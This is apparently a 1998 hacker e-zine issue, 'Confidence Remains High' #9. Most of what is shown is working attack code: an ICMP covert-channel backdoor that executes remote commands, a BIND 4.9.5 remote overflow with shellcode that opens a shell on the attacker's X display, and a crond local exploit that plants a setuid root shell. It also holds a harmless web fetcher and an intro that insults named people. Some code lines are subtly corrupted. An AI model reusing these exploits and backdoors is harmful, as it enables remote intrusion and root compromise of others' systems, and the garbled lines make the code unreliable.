ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ . [cZo] . Team CodeZero Presents . [cZo] . ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ `~Y$$$$s, `~~Y$$$$$s, ; ,ss$$$$$: :$$$$$$$s, ,ss$$$$P' :$$$$$$$$s,,sss$$: `YSss, :$$$$$$$: ,$$$$$$$P"':$$$$$$$: ,$$$$$$$$$:$$$$$$$ :$$$$$s, $$$$$$$$ `~~~Y$P" $$$$$$$$ ,ss$$$$$$$P"' :$$$$$$$ssssss $$$$$$$$ :$$$$$$$ ,s:$$$$$$$: `~'YSss, $$$$$$$$ `~Y$$$$$$$: $$$$$$$$ :$$$$$$$P'$$$$$$$$ :$$$$$$$s, :$$$$$$$$: :$$$$$$$$ `~Y$$$$$$: :$$$$$$$s;$$$$$$$: $$$$$$$$$P"'$$$$$$$$$ ,$$$$$$$$$: `~~Y$$s,,s$$$$$$P' $$$$$$$$$s, :$$$$$P' :$$$$$$$$$s, `~~Y$$$$$s, `$P"' :P"' $P' ,s$$P"' : `~s, ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Issue 9 11th May 1998 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Man with the plan : so1o The usual : om3n, zer0x, xFli, electro, spheroid, el8, ultima, chameleon. Not forgotten : loss, organik, peenut, pzn, suid helix, deprave, manly, Shok. Others : paladine, Sciri, fiji, ch-E-ztic, vacuum, humble. Cheers : Darkcyde, Jf. Russians : lirik, DemiGod, stranger, ps. Rhino9 : www.rhino9.org .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In This (compact) Installment of Confidence Remains High : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ------=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 9....................: Tetsu Khan ------=> Section B : Exploits And Code. 1. ICMP backdoor client and server....................: BiT 2. BIND 4.9.5 remote..................................: prym 3. flea.c.............................................: SrfRoG 4. Dillons Linux crond exploit........................: BM V 5. KDE klock local exploit............................: someone on bugtraq ------=> Section C : Phones / Scanning / Radio. 1. Wardialing in the UK...............................: Jf ------=> Section D : Miscellaneous (aka. d0x) 1. p0sse.rolodex (mad outdated anyway)................: juurigaveitout 2. RLoxley, first class fuckwit (and fatboy)..........: WH0 GN0Z? 3. Carolyn Meinel d0x.................................: savec0re ------=> Section E : World News. 1. MOD break DISN.....................................: JP ------=> Section G : FIN. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Confidence Remains High issue 9 : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Blah blah blah, welcome to CRH009, you will find el8 0-day exploits and code, as well as some semi-interesting texts on a fag called RLoxley, a cl00le$$ fuckwit called Carolyn Meinel, and some info on the MOD.. phear The Distro List : ================= 152.7.11.38 /pub/personal/tattooman/confidence_remains_high/ ftp.sekurity.org /users/so1o/ ftp.technotronic.com /ezines/crh/ cybrids.simplenet.com /Toast/files/CRH/ ftp.linuxwarez.com /pub/crh/ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. ICMP backdoor client and server : BiT ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ icmpd.c == server daemon icmpc.c == client <--icmpd.c--------------------------------------------------------------------> #include #include #include #include #include #include #include #include #define RID 31337 #define LID 12345 #define VER "0.3" void start_pipe(char *buf,int len); void send_connect(unsigned long to, unsigned int id,char *data); u_short cksum(u_short *buf, int nwords); void main() { char buf[512]; struct iphdr *ip=(struct iphdr *)buf; struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr)); int lsock,i; printf("ICMP PIPE %s - DAEMON PART - BiT'97\n",VER); if(geteuid()) printf("User luser detected\n"),exit(-1); lsock=socket(AF_INET,SOCK_RAW,1); close(0);close(1);close(2); if(fork()) exit(0); while(1) { i=read(lsock,buf,512); if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID) start_pipe(buf,i); } } void start_pipe(char *buf,int len) { char databuf[512]; FILE *haha; struct iphdr *ip=(struct iphdr *)buf; struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr)); int lsock,i; char *p; unsigned long int tmp; struct sockaddr_in sa; lsock=socket(AF_INET,SOCK_RAW,1); icmp->un.echo.id=ntohs(LID); sa.sin_family=AF_INET; sa.sin_addr.s_addr=ip->saddr; sendto(lsock,icmp,len-sizeof(struct iphdr),0,(struct sockaddr *)&sa,sizeof(sa)); /* connected */ while(1) { i=recv(lsock,buf,512,0); if(ip->potocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID) { p=(buf+sizeof(struct iphdr)+sizeof(struct icmphdr)); memcpy(databuf,p,i-(sizeof(struct iphdr)+sizeof(struct icmphdr))+1); if(strcasecmp(databuf,"exit") == 0) return; if((haha=popen(databuf,"r")) == NULL) send_connect(ip->saddr,LID,"Unknown command.\n"); else { i=0; while(fgets(databuf,512,haha) != NULL) { i++; send_connect(ip->saddr,LID,databuf); } if(!i) send_connect(ip->saddr,LID,"Unknown command.\n"); pclose(haha); } } fflush(stdout);fflush(stdin); } } void send_connect(unsigned long to, unsigned int id,char *data) { char buf[512]; struct icmphdr *icmp = (struct icmphdr *)buf; char *bla=(buf+sizeof(struct icmphdr)); struct sockaddr_in sa; int i,sock; sock=socket(AF_INET,SOCK_RAW,1); bzero(buf,512); icmp->type=0; icmp->un.echo.id=htons(id); strcpy(bla,data); icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1); sa.sin_family=AF_INET; sa.sin_addr.s_addr=to; i=sendto(sock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa)); close(sock); } u_short cksum(u_short *buf, int nwords) { unsigned long sum; for ( sum = 0; nwords > 0; nwords -- ) sum += *buf++; sum = ( sum >> 16) + ( sum & 0xffff ); sum += ( sum >> 16 ); return ~sum ; } <--end of icmpd.c-------------------------------------------------------------> <-icmpc.c---------------------------------------------------------------------> #include #include #include #include #include #include #include #include #include #include #include #define LID 12345 #define VER "0.3" unsigned int RID; unsigned long host,myip; int state=0; unsigned long int res(char *p); void send_connect(unsigned long to, unsigned int id,char *data); void get_string_and_send(void); void show_shit(char *buf); u_short cksum(u_short *buf, int nwords); void main(int argc, char **argv) { char buf[512]; struct iphdr *ip = (struct iphdr *)buf; struct icmphdr *icmp = (struct icmphdr *)(buf+sizeof(struct iphdr)); int i,lsock; fd_set f; printf("ICMP PIPE %s - CLIENT PART - BiT'97\n",VER); if(argc<3) printf("%s \n",*argv),exit(-1); if(geteuid()) printf("User luser detected\n"),exit(-1); host=res(argv[1]); RID=atoi(argv[2]); lsock=socket(AF_INET,SOCK_RAW,1); send_connect(host,RID,"a"); stat e=1; fcntl(lsock,F_SETFL,O_NONBLOCK); fcntl(fileno(stdin),F_SETFL,O_NONBLOCK); while(1) { fflush(stdout); fflush(stdin); FD_ZERO(&f); FD_SET(fileno(stdin),&f); FD_SET(lsock,&f); if(select(FD_SETSIZE,&f,NULL,NULL,NULL)) { if(FD_ISSET(fileno(stdin),&f)) get_string_and_send(); if(FD_ISSET(lsock,&f)) { i=read(lsock,buf,512); if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == LID) { if(state==2) show_shit(buf); if(state==1) { state++; printf("Connected.\n"); } myip=ip->daddr; } } } } } unsigned long int res(char *p) { struct hostent *h; unsigned long int rv; h=gethostbyname(p); if(h!=NULL) memcpy(&rv,h->h_addr,h->h_length); else rv=inet_addr(p); return rv; } void send_connect(unsigned long to, unsigned int id,char *data) { char buf[512]; struct icmphdr *icmp = (struct icmphdr *)buf; char *bla=(buf+sizeof(struct icmphdr)); struct sockaddr_in sa; int i,ssock; ssock=socket(AF_INET,SOCK_RAW,1); bzero(buf,512); icmp->type=0; icmp->un.echo.id=htons(id); strcpy(bla,data); icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1); sa.sin_family=AF_INET; sa.sin_addr.s_addr=to; i=sendto(ssock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa)); close(ssock); } void get_string_and_send(void) { char buf[512]; bzero(buf,512); read(0,buf,512); buf[strlen(buf)-1]=0; send_connect(host,RID,buf); if(strcasecmp(buf,"exit") == 0) exit(1); } void show_shit(char *buf) { printf((buf+sizeof(struct iphdr)+sizeof(struct icmphdr))); } u_short cksum(u_short *buf, int nwords) { unsigned long sum; for ( sum = 0; nwords > 0; nwords -- ) sum += *buf++; sum = ( sum >> 16) + ( sum & 0xffff ); sum += ( sum >> 16 ); return ~sum ; } <--end of icmpc.c-------------------------------------------------------------> ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. BIND 4.9.5 remote exploit : prym ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* * z, thnx. * ganked the xterm exec from adm, thnx. * have fun. * -prym */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define REMOTE #define DEFAULT_ANBUF_OFFSET 300 #define DEFAULT_TARGET 0 #define DEFAULT_OPTIMIZED 0 #define DLEN_VAL 4 #define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long)) #define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN) #define EVILSPACE (PACKETSZ-PRE_OF_DATALEN) #define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN) #define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN) struct target_type { char desc[40]; int systype; unsigned long addr; unsigned long opt_addr; }; struct target_type target[] = { {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4}, {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194}, {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c}, {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c}, {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8}, {{0},0,0,0} }; unsigned long resolve(char *host) { long i; struct hostent *he; if((i=inet_addr(host))<0) if((he=gethostbyname(host))==NULL) return(0); else return(*(unsigned long *)he->h_addr); return(i); } int send_packet(int fd, char *buff, int len) { char tmp[2], *ptr=tmp; PUTSHORT(len,ptr); if(write(fd,tmp,2)!=2) return(-1); if(write(fd,buff,len)!=len) return(-1); return(1); } int attack(int fd, struct in_addr us, struct target_type t, unsigned long offset, int optimized) { char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff; HEADER *dnsh=(HEADER *)buff; unsigned long i; int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL; memset(dnsh,0,sizeof(HEADER)); dnsh->id = htons(31337); dnsh->opcode = IQUERY; dnsh->rd = 1; dnsh->ra = 1; dnsh->ancount = htons(1); ptr += sizeof(HEADER); len += sizeof(HEADER); *ptr = '\0'; ptr++; PUTSHORT(T_A,ptr); PUTSHORT(C_IN,ptr); PUTLONG(31337,ptr); dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4; PUTSHORT(dlen,ptr); len += PRE_OF_DATALEN; memset(ptr,'X',(sizeof(buff)-(ptr-buff))); if(t.systype==0) { #ifdef REMOTE char c1[] = "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74" "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f" "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; char c2[] = "/usr/bin/X11/xterm\xff-display\xff"; char c3[32]; char c4[] = "\xfe\xe8\xb1\xff\xff\xff"; snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us)); c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3); c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3); i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4); memset(ptr,0x90,i); memcpy((ptr+i),c1,strlen(c1)); memcpy((ptr+i+strlen(c1)),c2,strlen(c2)); memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3)); memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4)); #else char c0de[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi"; int i = EVILSPACE-strlen(c0de); memset(ptr,0x90,i); memcpy((ptr+i),c0de,strlen(c0de)); #endif } else return(0); if(!optimized) { memcpy((ptr+(dlen-16)),&al,sizeof(al)); memcpy((ptr+(dlen-12)),&dl,sizeof(dl)); } i = (optimized?t.opt_addr:t.addr)+offset; memcpy((ptr+(dlen-4)),&i,sizeof(i)); len += dlen; return(send_packet(fd,buff,len)); } int main(int argc, char *argv[]) { unsigned long offset=DEFAULT_ANBUF_OFFSET; int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i; struct sockaddr_in sa; struct in_addr xs; for(i=0;target[i].desc[0];i++); if(argc<3) { fprintf(stderr,"\ntarget types:\n"); fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf", "description"); for(target_index=0;target_index [tt] [opt] [offset]\n", argv[0]); exit(-1); } if((argc>3)&&((target_index=atoi(argv[3]))>=i)) { fprintf(stderr,"error: invalid target type %d\n",target_index); exit(-1); } if((target[target_index].addr==0)&&(target[target_index].opt_addr==0)) { fprintf(stderr,"error: internal error\n"); exit(-1); } if(argc>4) { optimized = atoi(argv[4]); if((optimized!=0)&&(optimized!=1)) { fprintf(stderr,"error: invalid optimization setting %d\n",optimized); exit(-1); } } if((optimized==0)&&(target[target_index].addr==0)) optimized = 1; if((optimized==1)&&(target[target_index].opt_addr==0)) optimized = 0; if(argc>5) offset = atoi(argv[5]); if(!(xs.s_addr=resolve(argv[2]))) { fprintf(stderr,"error: can not resolve: %s\n",argv[2]); exit(-1); } if(!(sa.sin_addr.s_addr=resolve(argv[1]))) { fprintf(stderr,"error: can not resolve: %s\n",argv[1]); exit(-1); } sa.sin_family = AF_INET; sa.sin_port = htons(53); if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1)) { perror("error: socket"); exit(-1); } if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1)) { perror("error: connect"); exit(-1); } printf("target : %s\n",inet_ntoa(sa.sin_addr)); printf("target type : %s\n",target[target_index].desc); printf("optimized named : %s\n",(optimized?"YES":"NO")); printf("anbuff addr : 0x%x\n",(unsigned int) (optimized?target[target_index].opt_addr:target[target_index].addr)); printf("anbuff addr offset : %lu\n",offset); printf("xterm display dest : %s:0\n",inet_ntoa(xs)); printf("exploiting . . .\n"); switch(attack(sock,xs,target[target_index],offset,optimized)) { case -1: perror("error: attack"); return(-1); break; case 0: fprintf(stderr,"error: internal error\n"); return(-1); break; } if(close(sock)!=0) { perror("error: close"); return(-1); } exit(0); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. flea.c : SrfRoG ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* * flea.c : fetch stuff from the Web without launching a browser. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * */ /* * TODO: * * 1) Use threads for multiple gets. * 2) More file options. * 3) Better output display. * 4) Configuration file. * 5) Host cache'ing. * 6) HTTP/1.1 Message parsing / compliance. * 7) MIME types handling. * * Email comments / suggestions to srfrog@nema.com * */ #include #include #include #include #include #include #include #include #include #include #include #include #ifndef TRUE #define TRUE 1 #define FALSE 0 #endif #define m_isalpha(x) (((x) >= 'a' && (x) <= 'z') || ((x) >= 'A' && (x) <= 'Z')) #define m_isdigit(x) ((x) >= '0' && (x) <= '9') #define m_isspace(x) ((x) == ' ' || (x) == '\f' || (x) == '\n' || (x) == '\r' || (x) == '\t' || (x) == '\v') #define MAXLEN 512 #define WIDTH 79 #define VERSION "0.9" unsigned int serv_port(char); /* Some variables used */ static int nofetchfile = FALSE; static char *pn = (char *)0; typedef struct url_entry { char *hostname; unsigned int port; char *path; char *file; } URL; static void status(char *fmt, ...) { va_list msg; char buf[MAXLEN], *p = buf, c; int len; static int old_len = 0; va_start(msg, fmt); vsprintf(buf, fmt, msg); va_end(msg); len = strlen(buf) - 1; c = buf[len]; write(1, p, len); if (old_len > len) { int i, j; char k = ' '; for (i=0, j=(old_len - len); j > i; ++i) write(1, &k, 1); write(1, &c, 1); return; } old_len = len; write(1, &c, 1); } static int strcount(s, c) char *s, c; { int index=0, count=0; while (s[index] != '\0') { if (s[index] == c) count++; index++; } return(count); } static URL strip_url(url) char *url; { int i, idx=0, skip=0; char tmp[MAXLEN*2], *p = tmp; URL u; if (0 == strncmp(url,"http://",7)) idx = 7; for (i=0; (url[idx]!=':' && url[idx]!='/' && url[idx]!='\0'); i++,idx++) tmp[i] = url[idx]; if (i == 0) return (u); tmp[i] = 0; u.hostname = strdup(p); if (url[idx] == ':') { ++idx; for (i=0; m_isdigit(url[idx]); i++,idx++) tmp[i] = url[idx]; tmp[i] = 0; u.port = (unsigned int) atoi(p); } else u.port = 80; skip = strcount(&url[idx], '/'); for (i=0; skip > 0; i++,idx++) { tmp[i] = url[idx]; if (url[idx]=='/') skip--; } tmp[i] = 0; u.path = strdup(p); for (i=0; url[idx]!='\0'; i++,idx++) tmp[i] = url[idx]; tmp[i]=0; u.file = strdup(p); if (i == 0) { nofetchfile = TRUE; strcpy(p,"flea.dump"); u.file = strdup(p); } return (u); } static int connect_url(u) URL u; { struct hostent *host; struct sockaddr_in sin; int s = -1; if ((host = gethostbyname(u.hostname)) == NULL) { perror(pn); return(-1); } if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror(pn); return(-2); } sin.sin_family = AF_INET; sin.sin_port = htons(u.port); bcopy(host->h_addr, &sin.sin_addr, host->h_length); printf("Connecting to remote host %s:%u\n", u.hostname, u.port); if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror(pn); close(s); return(-3); } return (s); } static void process_file(fdw, fdr, u) int fdw, fdr; URL *u; { time_t start = 0L, end = 0L; int n, m, bytes=0; float x=0.0; char buffer[MAXLEN+1], *p = buffer; time(&start); while (1) { n = read(fdr, p, MAXLEN); switch (n) { case -1: status("%s: Read error: %s\n", u->file, strerror(errno)); break; case 0: time(&end); n = (int)(end - start) + 1; x = (float)bytes / (float)n; x /= 1024.0; status("%s: Received %d bytes in %d sec%s (%.3f kb/s)\n", u->file, bytes, n, (n == 1) ? "" : "s", x); break; default: m = write(fdw, p, n); if (m > 0) { bytes += m; status("%s: Writing: %d bytes\r", u->file, bytes); continue; } status("%s: Write error: %s\n", u->file, strerror(errno)); break; } break; } close(fdw); close(fdr); } static void launch_fetcher(url) char *url; { int sock = -1, i, j, outfd = -1; URL u; char tmp[MAXLEN*2]; /* sanity */ if (!url) return; u = strip_url(url); if (!u.hostname) { perror(pn); return; } if ((sock = connect_url(u)) < 0) return; if ((outfd = open(u.file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) { perror(pn); close(sock); return; } #if defined(__linux__) i = sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n", u.path, (nofetchfile == FALSE)?u.file:"/"); #else sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n", u.path, (nofetchfile == FALSE)?u.file:"/"); i = strlen(tmp); #endif if (send(sock, tmp, i, 0) < 0) { perror(pn); close(sock); close(outfd); return; } /* remove httpd header */ { char c; j=0; while (read(sock, &c, 1)) { tmp[j++] = c; if (c != '\n') continue; if (j > 2) { tmp[j]=0; j=0; printf("%s: %s",u.file,tmp); fflush(stdout); continue; } break; } } status("%s: Waiting for data connection...\r", u.file); process_file(outfd, sock, &u); } int main(argc, argv) int argc; char **argv; { if (argc < 2) { printf("\nflea Web fetcher v%s by SrfRoG (srfrog@nema.com)\n\n", VERSION); puts("\ Usage: flea [http://host[:port][/][filename]]\n\n\ If no file is given, the index file or file listing\n\ is dumped to 'flea.dump'.\n\n\ Examples:\n\ \tflea http://www.cgifx.com/img/cgifx.gif\n\ \tflea http://www.cgifx.com/img/\n\ \tflea http://www.cgifx.com"); fflush(stdout); return 1; } pn = argv[0]; launch_fetcher(argv[1]); return 0; } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. Dillons Linux crond exploit : BM V ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* Dillon's Crond v2.2 exploit */ /* */ /* There exists a buffer overflow */ /* in Slackware's /usr/sbin/crond */ /* in the fdprintf() function from */ /* subs.c [specifically vsprintf()] */ /* Also take note that the overflow */ /* was discovered by the KSRT team. */ /* */ /* Simply compile and run this. */ /* and look for a suid root shell */ /* in /tmp (/tmp/XxX) in about one */ /* minute. Also please use this in */ /* a responsible manner. */ /* */ /* also try crondsploit 1000 */ #include #include #include #include #include #define DEFAULT_OFFSET 560 #define DEFAULT_BUFFER_SIZE 980 #define TOTAL_BUFFER 4096 char shellcode[]= "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/tmp/xo"; long get_esp(void) { __asm__("movl %esp,%eax"); } void calc_bs(int *bs_ptr) { int len=0; struct passwd *p_name; /* dependant on length of username */ p_name=getpwuid(getuid()); len=strlen(p_name->pw_name); *bs_ptr = 986 - len; return; } int main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i, ofs=DEFAULT_OFFSET; int bs=DEFAULT_BUFFER_SIZE; FILE *fp=NULL; /* probably will not need to give argument */ if (argc==2) ofs=atoi(argv[1]); calc_bs(&bs); buff=malloc(TOTAL_BUFFER); if(!buff) { perror("malloc"); exit(EXIT_FAILURE); } ptr=buff; memset(ptr,0x90, bs-strlen(shellcode)); ptr += bs-strlen(shellcode); for (i=0; i\n"); fprintf(fp,"#include \n"); fprintf(fp,"main() {\n"); fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n"); fprintf(fp,"}\n"); fclose(fp); /* compile our program to create suid shell */ system("cc -o /tmp/xo /tmp/xo.c"); unlink("/tmp/xo.c"); /* now use crontab to plant overflow for crond */ fp=fopen("r00t","w+"); if (!fp) { perror("fopen"); exit(EXIT_FAILURE); } fprintf(fp,"%s\n",buff); fclose(fp); /* put our r00t crontab in crontabs directory */ system("/usr/bin/crontab r00t"); unlink("r00t"); /* helpful reminder */ printf("Now wait about 1 minute and look\n"); printf("for the suid shell -> /tmp/XxX\n"); exit(0); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. KDE klock local exploit : someone on bugtraq ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ..included in kde.gz with this crh009.zip 